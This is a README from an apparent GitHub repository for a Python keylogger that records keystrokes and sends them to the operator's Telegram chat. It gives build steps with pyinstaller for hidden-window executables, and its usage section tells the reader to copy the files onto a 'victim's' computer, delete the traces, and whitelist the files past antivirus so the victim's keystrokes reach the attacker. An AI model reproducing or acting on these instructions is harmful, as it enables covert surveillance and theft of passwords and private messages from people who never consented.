/Keylogger

Primary LanguagePythonMIT LicenseMIT

Keylogger

Take log of keys inputs and send to telegram 😉

Quick Start 🔎

Clone this repository

git clone https://github.com/rugvedkoshiya/Keylogger.git
cd Keylogger

Edit config.py file before use

TOKEN - Get API token from @BotFather CHAT_ID - where you want to upload logs in telegram. (forward any message from your channel or group to @userinfobot for getting Chat ID)

Create Virtual Environment

  • Windows

python -m venv myenv
  • macOS and Linux

python3 -m venv myenv

Activate Virtual Environment

  • Windows

.\myenv\Scripts\activate
  • macOS and Linux

source myenv/bin/activate
  • Windows

pip install -r requirements.txt
  • macOS and Linux

pip3 install -r requirements.txt

Create Executable File

  • Windows & macOS

pyinstaller --onefile "tele_first.py"
pyinstaller --onefile -w "tele_logs.py"
pyinstaller --onefile -w "tele_upload.py"

created .exe file will be in dist directory for windows

How to use

  • Copy paste this three files into victims computer
  • First run tele_first and enter information which it was asking
  • Done, now delete those files from where you pasted.
  • If antivirus blocks this files then add those files into whitelist
  • All set you got victims key's log into your telegram chat